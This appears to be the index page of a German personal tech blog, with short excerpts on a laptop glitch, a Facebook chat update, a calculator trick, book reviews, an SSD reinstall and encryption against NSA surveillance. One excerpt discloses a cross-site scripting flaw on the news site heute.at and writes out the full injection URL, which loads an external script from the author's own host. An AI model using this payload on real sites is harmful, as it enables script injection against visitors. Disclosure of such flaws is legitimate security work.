Logbucheintrag #3: Ein Dokument aus Anno 1601

Heute ist bei mir in Rechnungswesen mein Notebook plötzlich abgekackt. Tja… und beim wieder öffnen von Word wurde da plötzlich ein Datum aus dem Jahr 1601 angezeigt. Irgendwie melden sich alle meine elektronischen Helferlein aus anderen Zeiten (oder sogar Dimensionen? 😮 / sieh Logbucheintrag #2).

Vielleicht will mir mein Computer auch mitteilen, dass ich wieder mal Anno 1602 zocken sollte – wäre in dieser stressreichen Zeit eigentlich auch eine gute Abwechslung^^

Facebook Update: Mobile oder Web?


Facebook hat heute ein neues Update rausgeworfen, mit dem man im Chat sieht, ob jemand über Mobileapp oder über das Web online ist. Ob dabei Smartphone mit Browser auch berücksichtigt werden kann ich jetzt noch nicht sagen. Es sieht jedenfalls ganz schick aus und könnte sicher auch mal hilfreich sein.

Also mir gefällt’s 😀

Ahja ich hab auf Facebook English (US) eingestellt. Eventuell ist es im deutschen Sprachraum noch nicht verfügbar.

calc.exe: Cooles Feature für Quadratische Funktionen

Ich hab gerade per Zufall ein extremst cooles Feature im Windows Rechner (den calc.exe) gefunden. Und zwar einen “Shortcut” für ^2. Das Ganze funktioniert sehr einfach: Einfach die Zahl eingeben ein *-Zeichen dranhängen und dann die Entertaste verhauen. So wird aus 4* z.B. 16. Ganz besonders toll daran ist, dass dieser Trick auch im Standardmodus funktioniert und nicht extra die meist vielen (für z.B. mich unnötigen) “Profi”-Funktionen anzeigen lassen muss.

Viel Spaß damit! 🙂

Buchrezension: Grundkurs Gutes Webdesign

Wie bereits vor einem Monat angekündigt, hat ich mir letztens auch noch ein zweites Buch besorgt. Genauer gesagt handelt es sich um Grundkurs Gutes Webdesign von Björn Rohles, genau wie Flexible Boxes vom Galileo Computing Verlag. Die 24,90€ finde ich für rund 400 farbige Seiten inkl. DVD sehr preiswert. Das Buch kann unter anderem im Galileo Computing Shop und bei Amazon geordert werden. (mehr …)

Hacking and Cracking #2: XSS-Lücke bei heute.at

ACHTUNG UPDATE: Siehe weiter unten!
Für die deutschen Kollegen vorweg: “Heute” ist eine sehr große und kostenlose Tagespresse, die bei vielen vor allem durch die einfache Verfügbarkeit an Bahnhöfen etc. beliebt ist. Qualitätstechnisch könnte man sie über “Krone” oder “Bild” allerdings weit unter “derStandard” oder “Die Presse” einreihen.

Ja, mir war wieder einmal langweilig und schon bin ich wieder einmal auf eine brisante Sicherheitslücke gestoßen, dieses Mal allerdings auf einem, vor allem in Österreich stark vertretenem, großen Zeitungsportal. Es handelt sich dabei um eine XSS-Lücke, die über die URL injiziert wird. Damit konnte ich mittels eines Aufrufes von http://www.heute.at/news/politik/”><script src=”http://cheesi.cwsurf.de/heute.js”></script><a href=” nicht nur validen HTML-Code erzeugen sondern auch folgendes Ergebnis “produzieren” 😀 (mehr …)

Logbucheintrag #1: Ultrabooks sind keine Notebooks

Seit einiger Zeit erhalte ich vermehrt Fehlermeldungen von diversen Programmen (TrueCrypt, Flash, MP3Tag). Im Allgemeinen scheint es, als hätte es mir die gdiplus.dll zerschossen. Ich bin mir nicht ganz sicher (vielleicht ist es auch nur Zufall), aber ich glaube zu meinen, dass diese Probleme seit der Installation vom .NET-Framework 4.5 auftreten. Sei’s drum, kurz und knapp gesagt, hab ich auf Dauer die Schnauze voll von diesen ganzen Fehlern und wollte daher mein System resetten. Und um langen und zeitaufwendigen Backups zu umgehen, wollte ich mir einfach eine neue SSD einbauen und dort ein frisches System installieren. (mehr …)

Buchrezension: Flexible Boxes – Eine Einführung in moderne Websites

Heute ist das von mir lange ersehnte Buch “Flexible Boxes – Eine Einführung in moderne Websites” von Peter Müller per Post ins Haus geschneit. Das Buch ist vergangene Woche im Galileo Computing Verlag erschienen und bietet einen Überblick über moderne HTML5 und CSS3 Elemente, sowie in gesondertes Kapitel über Responsive Webdesign, dass sich vor allem mit Media Queries, Grids und den Frameworks YUML 4 und Foundation 4 beschäftigt. Die 24,90€ finde ich für das fast 450 Seiten Buch ganz okay. Eine DVD liegt nicht bei, das ist jedoch nicht weiter schlimm, da die Beispieldaten kostenlos von der Website des Autors heruntergeladen werden kann. Zudem hat mein Ultrabook kein Optisches Laufwerk, daher stört es mich persönlich noch weniger. Das Buch kann unter anderem im Galileo Computing Shop und bei Amazon geordert werden. (mehr …)

Mein Aufrüsten gegen NSA, PRISM & co.

Aufgrund der immer brisanteren Informationen von PRISM und NSA die nun an die Öffentlichkeit kommen, hat auch bei mir zum großen Umdenken geführt. Unter anderem habe ich dabei beschlossen, meine Mediennutzung grundlegend zu ändern und noch mehr auf Verschlüsselungen, speziell bei E-Mails und Daten, zu setzten, vor allem weil man sich damit bei der NSA angeblich noch beliebter macht ;). Zudem werde ich mich an der Entwicklung von Apps, Programmen und Mechanismen beteiligen um mich und andere Bürger zu schützten. (mehr …)